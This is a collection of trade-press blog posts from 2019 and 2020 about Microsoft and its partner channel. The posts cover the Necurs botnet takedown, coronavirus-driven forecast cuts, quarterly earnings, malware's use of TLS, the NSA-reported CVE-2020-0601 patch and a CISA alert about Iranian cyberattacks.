Microsoft, Partners Lead Global Offensive Against 'Necurs' Botnet

Microsoft and an international consortium of partners this week launched a counterstrike against Necurs, a massive botnet that Microsoft had been observing and analyzing for nearly eight years.

Botnets are packs of hundreds, thousands or millions of PCs, sometimes called zombies, that have been infected with malware and are under the command and control of malicious actors. Think of your parents' under-patched and out-of-support Windows 7 computer infected with a Trojan that enlists that computer in various nefarious schemes. The zombie PC's owner may notice nothing at all, or sometimes suspect a decline in performance. According to Microsoft, Necurs has had a role in a lot of those nefarious schemes.

Believed to be controlled by criminals in Russia, the botnet is also thought to have been used directly by its owners, as well as rented out as a botnet-as-a-service for various online skullduggery. One of its highest-profile roles was aiding in distribution of the GameOver Zeus banking trojan.

In the years since it first came to the attention of security researchers in 2012, the network has infected as many as 9 million computers globally. It has left its nasty digital fingerprints on pump-and-dump stock scams, fake pharmaceutical spam, Russian dating scams, Internet-based computer attacks, credential theft schemes, data theft attempts, cryptomining and, of course, ransomware. While botnets can be a key component of distributed denial-of-service (DDoS) attacks and Necurs has DDoS capabilities, Microsoft says that particular use for the botnet has not been documented.

Detailing what a big deal Necurs represents is a blog post from BitSight, a cyber risk management platform provider that worked closely with Microsoft on the Necurs problem. "From 2016 to 2019, it was the most prominent method to deliver spam and malware by criminals and was responsible for 90% of the malware spread by email worldwide," BitSight alleged.

In a sign of the complexity and length of the effort against Necurs, BitSight and Microsoft have been collaborating since 2017 to understand technical aspects of the botnet. That effort included techniques such as reverse engineering, malware analysis, module updates, infection telemetry, command and control updates, and forensic analysis, BitSight said.

In parallel with the technical work, Microsoft coordinated an international campaign involving the courts, other tech companies, ISPs, domain registries, government computer emergency response teams and law enforcement.

To prepare for the operational phase, Microsoft on March 5 got an order from the U.S. District Court for the Eastern District of New York. That order allowed Microsoft to take over the systems inside the United States that are used by Necurs for malware distribution and computer infections.

Microsoft and its partners crafted a sophisticated response built on the technical specifics of the Necurs botnet. Having studied the algorithm that Necurs uses to generate new domains, Microsoft used its considerable technical resources to jump ahead of the botnet. "We were then able to accurately predict over six million unique domains that would be created in the next 25 months," wrote Tom Burt, Microsoft corporate vice president for customer security and trust, in a blog post.

The response then leveraged Microsoft's web of global relationships with partner companies worldwide. "Microsoft reported these domains to their respective registries in countries around the world so the websites can be blocked and thus prevented from becoming part of the Necurs infrastructure," Burt said.

The main counterstrike was launched Tuesday from what a detailed New York Times account described as an "eerily empty Microsoft campus" due to most workers having been ordered home to prevent the spread of the coronavirus.

"By taking control of existing websites and inhibiting the ability to register new ones, we have significantly disrupted the botnet," Burt said. "Microsoft is also taking the additional step of partnering with Internet Service Providers (ISPs) and others around the world to rid their customers' computers of malware associated with the Necurs botnet."

As a concrete step, Microsoft is pointing users to the Microsoft Safety Scanner to help wipe their computers of malware, including Necurs.

While the Necurs botnet was massive, and Microsoft's effort to attack it required substantial resources, Microsoft executives were resigned that any drops in spam, malware and cyberattacks would be temporary at best. In the NYT article, executives described the effort -- sadly and accurately -- as a game of whack-a-mole.

Posted by Scott Bekker on March 11, 2020 at 2:56 PM0 comments


Coronavirus Concerns Sink PC, Smartphone Shipment Forecasts

Fears over the coronavirus and its effect on global supply chains will result in a leaner-than-expected year for the PC and smartphone markets, according to IDC.

The Framingham, Mass.-based research firm slashed forecasts last week for both PC shipments and smartphones. It now projects a 9 percent decline for the PC market in 2020, with total shipments reaching 374.2 million for the full year.

The big drops in shipments are expected in the first half of the year, with a decline of a little over 8 percent in Q1 and nearly 13 percent in Q2.

"We have already forgone nearly a month of production given the two-week extension to the Lunar New Year break and we expect the road to recovery for China's supply chain to be long with a slow trickle of labor back to factories in impacted provinces until May when the weather improves," said Linn Huang, an IDC research vice president, in a statement. "Many critical components such as panels, touch sensors, and printed circuit boards come out of these impacted regions, which will cause a supply crunch heading into Q2."

IDC's definition for PCs includes desktops, notebooks, workstations and tablets. Before the coronavirus appeared, IDC was already expecting a difficult year for PCs due to difficult comparisons against last year, when the Windows 7 replacement cycle boosted PC sales.

Also last week, IDC released revised forecasts for smartphone shipments in 2020. The firm had previously expected a better year for smartphones. Now, however, the supply chain issues along with potential drops in demand in the world's largest smartphone market of China due to prevalence of the coronavirus there are causing IDC to anticipate a decline of more than 2 percent in 2020. Shipment volumes are expected to reach around 1.3 billion units for the full year.

While IDC expects the PC market to work its way slowly out this slump, the firm is more bullish on the smartphone market, which should benefit from a 5G tailwind in 2021.

Posted by Scott Bekker on March 02, 2020 at 2:26 PM0 comments


Microsoft: Coronavirus To Put Damper on Windows Business

Microsoft's third-quarter results will likely take a hit from the global coronavirus emergency and its impact on the supply chain, Microsoft warned investors this week.

The warning comes less than one month after Microsoft's Q2 earnings results, in which surprisingly strong demand for Windows, partly driven by end-of-support deadlines, helped the company exceed Wall Street expectations.

Even in its Q2 earnings call, however, Microsoft was already priming investors for a potential effect from the coronavirus, also known as COVID-19, which arose in Wuhan and has led to mass quarantines and industrial shutdowns in China. At the time, Microsoft provided what it called a wider-than-usual range of quarterly revenue guidance of $10.75 billion to $11.15 billion for the More Personal Computing segment, which includes Windows and Surface.

"Although we see strong Windows demand in line with our expectations, the supply chain is returning to normal operations at a slower pace than anticipated at the time of our Q2 earnings call," Microsoft said in its statement Wednesday. "As a result, for the third quarter of fiscal year 2020, we do not expect to meet our More Personal Computing segment guidance as Windows OEM and Surface are more negatively impacted than previously anticipated."

Microsoft did not provide a new range for the current quarter, which runs through the end of March. Revenues for other business units are not expected to be affected.

In the large stock market losses earlier in the week, Microsoft shares declined, but at a slightly lower rate. In extended trading after the announcement, Microsoft shares dropped a further 2%. Also following Microsoft's announcement, chipmaker Intel's shares declined about 1% and PC maker Dell's shares fell by about the same amount.

Posted by Scott Bekker on February 27, 2020 at 1:31 PM0 comments


SophosLabs: A Quarter of Malware Using TLS

The industrywide push in recent years toward encrypting Web traffic isn't just for good guys.

Encryption has always been neutral, as useful to bad actors for hiding nefarious activity as it is for legitimate users trying to protect their data from those trying to steal it.

New research from SophosLabs documents how widespread the use of HTTPS connections is becoming in malware circles, especially for communicating back to command-and-control servers (C2).

SophosLabs on Tuesday reported on a representative sampling of malware analyses the research team has conducted over the past six months.

"Out of all the malware that made some kind of network connection during their infection process, about 23% communicated over HTTPS, either to send or receive data from the C2, or during installation when they may use HTTPS to conceal the fact that they are retrieving malicious payloads or components," SophosLabs threat researcher Luca Nagy wrote in the blog post describing the research.

Not all types of malware communicate equally over TLS. Information-stealing trojans made up only 16 percent of the samples SophosLabs tested during the six-month period, but of those, 44 percent used TLS over standard HTTPS ports. Ransomware, which does its damage in other ways, was less likely to use encryption when calling home.

Sophos released the research Tuesday in conjunction with the launch of a new firewall, which features more advanced SSL inspection, including support for TLS 1.3 without requiring downgrading, new policy tools and performance improvements. More detail on XG Firewall v18 is available here.

Posted by Scott Bekker on February 18, 2020 at 2:29 PM0 comments


NuWave Offers Partners a White-Label Route to Teams Voice

As Microsoft herds its collaboration users toward the Teams platform, Teams voice services have grown rapidly, as well. Even with the rapid gains, usage of voice services in Teams represents a tiny fraction of overall Teams adoption. That lag reflects the challenges unique to voice, from network optimization to working with carriers to requirements for provisioning users.

One early technology partner of Microsoft's on Teams voice is trying to spur voice adoption with a new partner program. NuWave Communications on Thursday launched a white-label program to help partners and resellers get customers into voice plans without the need to build up expertise on daunting voice technologies.

Las Vegas-based NuWave now offers the white-labeling of iPilot, which is the company's relatively new provisioning portal for Teams Direct Routing customers. The iPilot portal works with NuWave's Direct Routing calling plans.

Mark Bunnell, chief operating officer for NuWave, contends that the time is right for voice services through Microsoft. "When Office 365 is the center of your universe as a business, it's really easy to think about getting Teams voice and bringing it all together," Bunnell told me in an interview Thursday.

"Teams right now is equated to the gold rush. Like the gold rush, nobody brought clothes or food so they froze to death on the way up there."

Mark Bunnell, COO, NuWave

As they have with Lync, Skype and other Microsoft services, however, partners struggle with the leap from IT infrastructure to voice services.

"Teams right now is equated to the gold rush. Everyone is trying to get a piece, everyone is trying to turn on a Teams practice. Like the gold rush, nobody brought clothes or food so they froze to death on the way up there," Bunnell said of the rough experiences some customers and partners have had with voice services.

NuWave's approach stems from the company's 20-plus year history in SIP Trunking, hosted PBX, unified communication as a service (UCaaS) and related fields. "We've taken the extremely complex and we've made a turnkey solution that doesn't make [the partners] be technical," Bunnell said.

First, iPilot leverages NuWave's experience from several years of Teams voice deployments, covering migrations from Microsoft's older voice platforms or other sources and handling the PowerShell elements of provisioning users within a customer's Microsoft tenant. As the provider of the lines, the company also saves time in setting up proofs-of-concept from a process that can take several weeks in many cases to under an hour, Bunnell said.

After the set up, NuWave provides end-user training materials, such as user guides and videos, to get customers up to speed quickly. With the white-label program, partners have the ability to customize the pricing customers see and the phones they want to offer, he said.

"It really enables you to turn up a customer, get them fully trained and move on to the next one," Bunnell said.

Voice services aren't for every Office 365 partner. But for those looking for a way to spin up a quick, low-investment Teams voice practice, NuWave is saying the right things.

Posted by Scott Bekker on February 13, 2020 at 10:16 AM0 comments


Ian Thornton-Trump's Hair Is on Fire About Threat Intelligence for the Channel

One of the most engaging voices in the IT channel security community, Ian Thornton-Trump, is on the move. RCP caught up with Thornton-Trump last month just as he was getting started in a new role at Cyjax, an 8-year-old U.K.-based cyber threat intelligence provider.

Thornton-Trump joins Cyjax as chief information security officer. The dual role includes internal cybersecurity responsibilities along with helping the company prepare for an expansion into the U.S. channel. At the same time, Thornton-Trump is piloting a cyber threat intelligence workshop for CompTIA.

We talked to Thornton-Trump about why he thinks the moment is right for managed service providers (MSPs) to get involved in security threat intelligence. Edited excerpts of the conversation are below.

Two major security issues a few years ago got Thornton-Trump thinking seriously about security intelligence and the channel.
"I go back to really WannaCry and EternalBlue. The US-CERT and Microsoft made noises prior to that malware being weaponized. At that time it was about 58 days before the first impactful attacks happened from when Microsoft announced that there is a vulnerability in [its Server Message Block protocol], and they were pushing patches even for out-of-date operating systems. Now, the threat intelligence analysis of that is kind of, 'Holy crap, if Microsoft is going to support unsupported operating systems and issue and out-of-band patch for it, it must be super bad.'

"For whatever reason, I don't think people were paying attention. When you look at some of the big dogs out there, Maersk and Merck, the pharmaceutical company, that then got hit by NotPetya, which leveraged the same attack, essentially, as WannaCry, you kind of wonder if anybody was listening out there.

"So I felt like for the small/medium business practitioners and those MSPs that service them, no one was really providing good, credible intel to small and medium-sized business [SMB] customers about this stuff."

"Historically, cybersecurity practitioners and IT practitioners may be somewhat challenged in terms of business communication."

Ian Thornton-Trump, CISO, Cyjax

In the nearly three years since those attacks, Thornton-Trump believes government agencies in the United States and the United Kingdom have greatly improved their alerting and threat communications. Yet he also contends that MSPs and SMB IT pros need much more help.
"The importance of a government tool to tell you that you're vulnerable means rather than it being the security guy who's all concerned going to the business, it's literally the government telling you that you need to patch."

Thornton-Trump said he sees an opportunity for Cyjax, which offers threat intelligence and associated dashboards, to provide some of the data that will help MSPs make the business case for action.
"Historically, cybersecurity practitioners and IT practitioners may be somewhat challenged in terms of business communication. Having data from a third-party trusted source that says, 'Listen, we have X number of assets that are vulnerable to BlueKeep. We need to disrupt the business operations for a couple of hours to patch and update our infrastructure so that we're not victimized by a cybercrime attack, which in 90 percent of the cases for business today would be a very disruptive ransomware attack requiring weeks and unanticipated financial expenses.'

"We can we can go into boardrooms with our hair on fire. But if when we're challenged by the business to provide a true statement or understanding of the risk, a lot of it falls down because what the practitioners are not doing is coming armed to the fight with the return on investment or the stark warnings from government bodies, law enforcement bodies. I want to close that gap in the channel."

As Cyjax works on a channel program to adapt its cyber threat intelligence offerings to MSP technical and business requirements, Thornton-Trump says the sector has the potential to be a high-value, low-cost revenue opportunity for MSPs and IT service pros.
"I'm excited about the opportunity to take my original message of layered security and now turn it into a true proactive threat model -- modeling and risk management by using intelligence."

At the same time, Thornton-Trump is demonstrating a workshop/course on "Cyber Threat Intelligence" at the CompTIA conference in Manchester, England next month.
"The course is designed to help an MSP or an SMB build its own threat intelligence program using publicly available tools. My idea here is to equip businesses to get in front of cyber attacks, get meaningful data and make appropriate business decisions based on their threat model and their risk profile. I'm really passionate about that. I want to create more capacity."

Both efforts, building a channel program for Cyjax and developing the independent training, are coming at a key time for MSPs, in Thornton-Trump's estimation.
"This is coming at a moment where MSPs are waking up and finding many of their customers victimized by ransomware, which is potentially putting their livelihood at risk. I'm talking about the Cloud Hopper series of attacks, which has now been adapted by cybercriminals who are specifically targeting MSPs and IT service pros. So I think the time is right to get the upper hand and to get the opportunity to get in front of these attacks, and protect customers and ultimately protect the livelihood of businesses."

Posted by Scott Bekker on February 11, 2020 at 12:04 PM0 comments


Top Microsoft Partners Wanted: Nominations Open for the RCP 350

Want to get your Microsoft partner company noticed in 2020? Submit your entry to be included in Redmond Channel Partner's RCP 350 list.

As in previous years, it's a qualitative list of the Microsoft solution provider companies that demonstrate a laser focus on Microsoft technology and a strong commitment to providing great value for their customers.

There are a few requirements -- companies that get listed must belong to the Microsoft Partner Network (MPN), must have major end-user service operations in the United States and should have at least one Microsoft gold competency.

Beyond that, the list is subjective. We're not just looking for the biggest companies or the broadest coverage of Microsoft technologies. Some winners are niche providers, focused on a sliver of the Microsoft stack. Others have a great local reputation. Still others are regular Microsoft regional award winners.

There are a few exciting differences in the list this year. For one, we're expanding from the previous 200 entries to 350. It will still be an elite few of the tens of thousands of Microsoft partners in the United States, but the list will be more comprehensive.

What is more important is where the list will appear. In its final form, the RCP 350 will be posted as a PDF on RCP's sister site, Redmond. Redmond is the premier site where C-level executives, IT decision makers and IT professionals go for their Microsoft infrastructure news and commentary. By appearing in the list on Redmond, your company will be in front of more potential customers interested in the types of expertise you have.

Selection for the list is a judgment made by our editors as a service to readers of RCP and Redmond. There is no cost for submissions or inclusion in the list. Results will be released in July 2020.

The survey is short. There are only 11 questions, including company basics and contact information. Revenues and employee headcount questions are optional. We recommend that you put your main effort into this question: "Briefly explain why the company belongs in the RCP 350." There is effectively no character limit for your answer, although we respectfully request that you keep it to fewer than 500 words for purposes of our sanity here at RCP.

Does your company have what it takes? Fill out the application here by April 3 to make sure you're considered.

Posted by Scott Bekker on February 04, 2020 at 1:58 PM0 comments


Windows Plays a Surprisingly Positive Role in Microsoft Earnings

Surprisingly strong demand for Windows, partly driven by important end-of-support deadlines, was among the major factors helping Microsoft exceed Wall Street expectations for its most recent quarter.

Microsoft on Wednesday evening reported revenues of $36.9 billion and diluted earnings per share of $1.51, both well ahead of consensus analyst expectations. The earnings period covered Microsoft's second financial quarter, which spans the last three months of 2019. The usual growth sources, like Azure, Office 365, Dynamics and LinkedIn, all delivered in the quarter. But Windows, which has been more of a drag of late, was a standout in Q2.

It was the last full quarter before end-of-support deadlines hit on Jan. 14 for Windows 7, Windows Server 2008/R2 and Hyper-V Server 2008/R2.

Microsoft's overall business unit that includes Windows clients is More Personal Computing, and the sector outpaced the company's previous guidance. "Revenue was $13.2 billion, increasing 2% and 3% in constant currency, ahead of expectations as better-than-expected performance across our Windows businesses more than offset lower than expected search and Surface revenue," Microsoft CFO Amy Hood said during the earnings call with investors Wednesday.

The end-of-support effects were strong in the OEM Pro sector, which Hood said makes up roughly 40% of total Windows revenue. Those revenues, she said, "grew 26%, driven by continued momentum in advance of Windows 7 end of support and strong Windows 10 demand."

Windows Server 2008 end-of-support also contributed to overperformance in a different business unit, Intelligent Cloud. "Our on-premises server business grew 10% and 12% in constant currency with roughly four points of benefit from the end of support for Windows Server 2008," Hood said.

End of support was only one among several factors affecting the gains for Windows. On the PC side, market growth was stronger than Microsoft anticipated. It also benefited from comparisons to last year, when a chip shortage was inhibiting OEM partners' ability to ship PCs. Microsoft's More Personal Computing unit also benefitted from revenue growth in commercial products and cloud services, which includes Microsoft 365.

On the server side, Hood also credited some of the growth to Azure Hybrid Benefits, which allow Software Assurance customers to put Windows Server licenses into virtual machines on Azure at a reduced cost.

For the current financial quarter, Microsoft expects the support deadlines that just passed to provide a continuing boost to revenues.

"In Windows, overall, OEM revenue growth should be in the low to mid-single digits and continue to reflect healthy Windows 10 demand, end of support for Windows 7 and the supply chain's ability to meet demand," Hood said. "Growth in our on-premises server business should be high single digits, again driven by strong hybrid demand, as well as some continued benefit related to the end of support for Windows Server 2008."

One variable for Windows revenues in Q3 is a question mark for everyone -- the coronavirus outbreak, which has led to the quarantining of 16 cities in China and prompted Russia to begin closing its border with China.

Hood cited the "uncertainty related to the public health situation in China" as the reason Microsoft's guidance for next quarter in More Personal Computing covers a wider range of revenues than usual.

Posted by Scott Bekker on January 30, 2020 at 10:50 AM0 comments


Nadella: 'Building Tools for Developers Is Who We Are as a Company'

Microsoft CEO Satya Nadella reaffirmed the company's central focus on developers in no uncertain terms this week.

Speaking to financial analysts on Wednesday during a wide-ranging investor call about Microsoft's second quarter earnings, Nadella said, "We want to build the best tool chain."

Then, he got into why:

The statement came in response to a question from Morgan Stanley equity analyst Keith Weiss about Nadella's views on Microsoft's progress with developers since the major GitHub acquisition in 2018.

"We're very excited about what's happening with the developer offering," Nadella said. "I think of what we are doing between Visual Studio and Azure DevOps and GitHub as effectively coming together as a compelling developer's SaaS solution in the same class as any other SaaS solution from Microsoft around productivity and communication."

Most of the talk out of Microsoft lately emphasizes Azure, cloud more generally or artificial intelligence. Nadella's comment to analysts, however, shows that he hasn't forgotten who must make the software giant's offerings work at an individual company level.

In fact, Nadella likes to point out that there are more software engineers/developers in the non-tech sector now than there are in the tech sector itself.

And while Weiss couched his question in the context of whether the developer tools give Azure a competitive advantage over Amazon Web Services and Google Cloud Platform, Nadella steered it back to Microsoft being focused on the needs of developers rather than a need to advance Microsoft platforms.

"We're not focused only on Azure. For developers who use our tool chain, they can target any cloud, any edge device. And so this is not a sort of means to some end; we've always been clear about it, it's an end to itself," Nadella said. "We want to stay true to that ethos of open source, GitHub, and do the best tools."

Now, before things sound too pie-in-the-sky, Nadella reassured the audience of investors that those developer tools as a SaaS business are high-margin for Microsoft and suggested that the tools are optimized for developers coding for the Microsoft ecosystem.

Nadella's profession of love for building tools for developers doesn't have the wild, enthusiastic energy of former CEO Steve Ballmer sweatily pointing and yelling "Developers! Developers! Developers! Developers!"

Yet Microsoft's third CEO's quiet, confident and understated delivery communicates an equally forceful commitment.

Posted by Scott Bekker on January 30, 2020 at 11:29 AM0 comments


The NSA Takes Center Stage on a Microsoft Patch

The U.S. National Security Agency discovered, reported and was publicly credited by Microsoft for a significant vulnerability that is included in the first Patch Tuesday release of the year.

The NSA's public cooperation with Microsoft in defending users of the operating system marks a change from the agency's well-documented past practice of quietly collecting and weaponizing serious OS flaws that are discovered by its researchers.

Microsoft and the NSA offered differing characterizations of the flaw in Windows 10, Windows Server 2016 and Windows Server 2019. While Microsoft encouraged all users to rapidly apply the patch, the structure of Microsoft's extensive vulnerability rating system slightly underplays the severity of the flaw. The NSA, on the other hand, warned that the consequences of not patching would be "severe and widespread."

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also released an Emergency Directive and Activity Alert regarding the flaw on Tuesday. While CISA's directive only applies to certain federal agencies, the agency's warnings are often heeded by state and local governments and private sector organizations.

In a Cybersecurity Advisory released at the same time as Microsoft's patches, the NSA said:

NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows cryptographic functionality. The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution. The vulnerability affects Windows 10 and Windows Server 2016/2019 as well as applications that rely on Windows for trust functionality. Exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities.

Offering examples of ways that validations of trust may be impacted, the NSA cited HTTPS connections, signed files and e-mails, and signed executable code launched as user-mode processes.

"The vulnerability places Windows endpoints at risk to a broad range of exploitation vectors," the NSA statement said in explaining the agency's alarm over the issue. "NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners."

On Microsoft's severity scale, however, the vulnerability was rated as being "important" rather than Microsoft's top level of "critical." Microsoft noted that the flaw had not been publicly disclosed, and there were no known public exploits of the flaw currently. Microsoft did give the flaw its "exploitation more likely" rating for both its latest software releases and older software releases. That is the highest level on Microsoft's exploitability index assessment short of flaws for which exploits already exist. Microsoft applies that rating in cases where Microsoft believes exploit code could be created to consistently exploit the vulnerability and when there are past cases where the specific type of vulnerability has been exploited.

Microsoft's technical description of the vulnerability acknowledges the NSA, which is a first. In a separate public statement about CVE-2020-0601, Mechele Gruhn, principal security program manager for the Microsoft Security Research Center, does not name the NSA but does talk about cooperation with security researchers to work on patching newly discovered vulnerabilities.

"This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk," Gruhn wrote.

Rumblings that a major patch was on the way emerged earlier in the week. The Krebs on Security blog posted an article on Monday with details of the patch collected from sources, and referenced Twitter posts from security industry insiders who indicated something substantial was afoot.

The agency's cooperation reflects a larger debate about the appropriate role of America's digital spy agency. Historically, the organization is known for its offensive capabilities, hiring top researchers to find and exploit vulnerabilities, build them into sophisticated toolsets, and keep those tools secret and productive for as many years as possible. But the recent security/intelligence/public relations disasters involving the EternalBlue tools released by the Shadow Brokers group highlighted a huge self-defeating flaw in the approach. Namely that with the United States being one of the most digitized and Internet-connected countries in the world, when those U.S.-developed tools get into the hands of adversaries of the United States and U.S. businesses, they can do more damage to the U.S. than they could do to their intended targets.

In a statement reported by The Washington Post, a senior NSA official acknowledged the shift in gears represented by the public cooperation on protecting infrastructure versus secretly attacking it.

"This is...a change in approach...by NSA of working to share, working to lean forward, and then working to really share the data as part of building trust," the Post quoted Anne Neuberger, director of the NSA's Cybersecurity Directorate, as saying Tuesday. Krebs on Security's Brian Krebs, apparently reporting from the same NSA news conference, added via Twitter that Neuberger also said this wasn't the first time NSA has reported a vulnerability to Microsoft, but it is the first time it has accepted credit or attribution when Microsoft asked.

The NSA dubs the operation "Turn a New Leaf," and it received praise from security researchers. That said, the agency's strategic mission of exploiting enemy networks undoubtedly remains unchanged.

Yes, the NSA has just helped Microsoft and its more attentive customers patch a flaw. At the same time, is it tinfoil hat territory to bet that other teams at NSA are involved in the race to develop exploits based on the same vulnerabilities, or perhaps have already done so given the agency's head start?

What we have here is a complicated dance. The NSA is playing a slightly more transparent -- and from the standpoint of software vendors and their customers, a more constructive -- role in network security than it has in the past. At least it is playing that role in this specific case. We'll take what we can get.

Posted by Scott Bekker on January 14, 2020 at 9:39 AM0 comments


Feds Warn of Potential Iranian Cyberattacks

The U.S. agency in charge of cybersecurity is urging organizations in the United States to prepare for potential attacks from Iran in response to the American drone killing of General Qassim Suleimani.

The Cybersecurity and Infrastructure Security Agency (CISA) issued its warning, "Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad," on Monday afternoon. CISA is a federal agency created in 2018 to coordinate with other government entities and the private sector on cybersecurity and critical infrastructure protection.

The drone attack as Suleimani was visiting Baghdad last week is widely expected to prompt counterattacks of some sort from Iran, with Iranian leaders vowing as much in recent days. One of the most rapid ways that Iran can respond is through attacks on computer systems of U.S. businesses and government agencies.

"Iran has a history of leveraging asymmetric tactics to pursue national interests beyond its conventional capabilities," the CISA alert said. "More recently, its use of offensive cyber operations is an extension of that doctrine. Iran has exercised its increasingly sophisticated capabilities to suppress both social and political perspectives deemed dangerous to Iran and to harm regional and international opponents."

A site defacement already occurred over the weekend, when the Web site for the U.S. Federal Depository Library Program was replaced with an image of a bloodied President Trump being punched in the face. Text in English across the bottom of the page read, "Hacked by Iran Cyber Security Group HackerS ... ;)". A CISA spokesperson told the Washington Post that the attacker used a misconfiguration within the content management system to effect the defacement, and that CISA was unable to provide confirmation that the attack had any actual link to Iran.

In a primer section of its alert, CISA recommended that organizations "adopt a state of heightened awareness," "increase organizational vigilance," "confirm reporting processes" and "exercise organizational incident response plans." The document also details mitigation and detection recommendations for advanced persistent threat techniques that Iranian state-sponsored actors are believed to have used in the past, such as spearphishing, credential dumping and attacks involving PowerShell or scripting.

The full alert is available here.

Posted by Scott Bekker on January 06, 2020 at 11:20 AM0 comments


Top 5 Microsoft Partner Stories of 2019

This year was as eventful for Microsoft partners as any in this decade.

As the year draws to a close, here's a look at some of the biggest stories that happened in 2019.

1. Ransomware Roared Back
At the beginning of this year, it looked like ransomware might have plateaued. Not so. One of the most damaging computer malware incidents to date happened to Baltimore, when a ransomware attack in May took much of the city's infrastructure offline for weeks and other systems down for month. Meanwhile, a trio of attacks on municipal governments in Florida brought record-setting ransom payouts.

The upshot of all this activity is that managed service providers (MSPs) and other types of Microsoft partners spent a lot of time in 2019 educating customers about ransomware, protecting them from attacks and helping them recover from incidents.

2. Microsoft Opens up 'Channel as a Service'
Microsoft launched a significant effort in calendar 2019 to connect its independent software vendor (ISV) partners with its cloud solution provider (CSP) partners through its marketplaces and incentive structures. The results aren't in yet, but the moves have the potential to take the promise of Microsoft's 300,000-partner-strong channel and convert it into more revenues for everyone involved.

One part involves expanding the multibillion-dollar co-sell program beyond Azure to also include Microsoft 365, Dynamics 365 and Power Platform. The other part involves allowing partners to resell ISV solutions through Microsoft's CSP program.

3. Scuttled IUR/Competency Changes
Microsoft faced a full-scale partner mutiny around the time of its annual partner conference, Microsoft Inspire, in July. A plan disclosed shortly before the Las Vegas conference would have had Microsoft revoking partners' ability to use internal use rights (IURs) to run their businesses.

But a substantial partner backlash, which included a very public Change.org petition, against the planned IUR revocation and some changes to competencies caused Microsoft to reverse course. In the end, Microsoft apologized for the incident and promised to do a better job consulting with partners earlier in the decision process for program changes that would have a major effect on the way partners do business.

4. Azure Lighthouse
Microsoft took a major step to make Azure a friendlier platform for MSPs in 2019. The effort takes the form of a native toolset called Azure Lighthouse.

Using Azure Lighthouse, partners can manage multiple customers in a secure, multitenant environment with automation. Another way to look at it is as a single control plane for service providers to view and manage Azure across their customers. Azure Lighthouse reached general availability in July.

5. Microsoft Hits $1 Trillion
In the race for a $1 trillion market cap, Microsoft seemed like a dark horse, behind Apple, Amazon and Alphabet. Although Apple and Amazon reached the milestone first, Microsoft cleared that hurdle and impressively remained there more consistently than the others. After years of getting kicked around by Wall Street, Microsoft took its place in 2019 as one of investors' most respected companies.

For the Microsoft channel, the market cap provided some positive buzz around the Microsoft brand for much of the year.

As for what to expect in 2020, several big trends are already clear. Azure migration momentum should continue after being spurred by the Windows Server 2008 support deadline next month. The controversy over Microsoft's winning the Department of Defense JEDI contract, and Amazon's contesting of the decision, will continue to roil as the Amazon Web Services (AWS) lawsuit works its way through the courts. And Microsoft will continue to tinker with its partner program levers to urge partners to help make artificial intelligence an everyday technology for customers.

What else will be big next year? We'll find out as it happens.

Posted by Scott Bekker on December 31, 2019 at 11:17 AM0 comments